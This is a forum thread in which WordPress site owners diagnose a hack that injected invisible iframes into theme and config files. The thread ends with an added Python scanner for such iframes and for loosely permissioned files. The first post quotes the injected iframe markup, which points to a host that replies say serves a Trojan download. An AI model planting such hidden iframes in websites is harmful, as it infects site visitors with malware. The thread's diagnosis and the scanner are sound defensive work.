• This morning after posting on one of my WordPress blogs, I noticed in the status bar that I was transmitting data to http://step57.info/traff/index.php
    Problem is: I have no idea how that got there. I went in and looked at a couple of my blogs, and 5 of 8 of them had the following code:
    [code]<iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe><iframe width="1" height="1" src="http://step57.info/traff/index.php" style="border: 0;"></iframe>[/code]

    in the header, footer, and body. I have no idea where this came from. Has anyone seen this before? I can’t find any info on this through Google.

Viewing 4 replies - 1 through 4 (of 4 total)
  • My bet says your theme files were writable and that the server on which your site is on was compromised by a script kiddie.
    The hosts will probably deny it and blame WP.
    Change your file permissions to 644 if possible, including themes.

    Nathanwburke, I had this same thing happen to me just the other day, but on my site that has WordPress Multiuser. So far I have only spotted that it had added a file to /wp-inst/ and added the lines you mentioned to /wp-inst/wp-config.php at the end of the file.

    My friend who has a blog on my site alerted me to the problem when he got error messages on the site, but also a virus warning.

    Thanks, Podz, for the suggestion, and I will do that to my site, but actually none of the themes were affected by the hack.

    UPDATE —

    Took Podz's advice on changing permissions, but for those with WPMU the wp-inst folder still needs to stay as 777. Make absolutely sure that wp-config (which contains your database password) stays with the strictest permission; basically allowing only reading from the server is best, I think.

    I had a similar incident – removed permission – things seem to have returned to normal!

    The same thing happened to my site. The active theme and one other both had the iframe code added past the body tag. The index.php it calls runs JavaScript to download an app.wmf that Norton IDs as a Trojan download. Changing the file permissions has fixed it for now.
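
Added example, not part of the original thread: a Python check for the two things the replies describe, invisible (0 or 1 pixel) iframes appended to site files and files left writable by group or others (anything looser than the 644 suggested above). The function names and the list of scanned extensions are assumptions made for this sketch; `SAMPLE` is one iframe tag as quoted in the first post.

```python
import os
import re
import stat
import sys

# One tag as quoted in the first post of the thread.
SAMPLE = ('<iframe width="1" height="1" src="http://step57.info/traff/index.php" '
          'style="border: 0;"></iframe>')

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# width/height attribute whose value is exactly 0 or 1 (optionally "px")
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?([01])(?:px)?["'\s>]""", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

def hidden_iframes(text):
    """Return the src of every iframe whose width and height are both 0 or 1."""
    found = []
    for tag in IFRAME_RE.findall(text):
        dims = {name.lower() for name, _ in DIM_RE.findall(tag)}
        if dims == {"width", "height"}:
            src = SRC_RE.search(tag)
            found.append(src.group(1) if src else "")
    return found

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk root. Return (injected, writable): a dict of file -> hidden iframe
    sources, and a list of regular files writable by group or others."""
    injected, writable = {}, []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):
                continue  # skip symlinks, sockets and other non-regular files
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                writable.append(path)
            if name.lower().endswith(exts):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = hidden_iframes(fh.read())
                if hits:
                    injected[path] = hits
    return injected, writable

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    injected, writable = scan_tree(root)
    for path, srcs in injected.items():
        print(f"hidden iframe in {path}: {', '.join(sorted(set(srcs)))}")
    for path in writable:
        print(f"group/other-writable: {path}")
```

Run it against the WordPress directory (for example the theme folder or `/wp-inst/`); it only checks regular files, so directory permissions still need a separate look.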

  • The topic ‘Have my sites been attacked?’ is closed to new replies.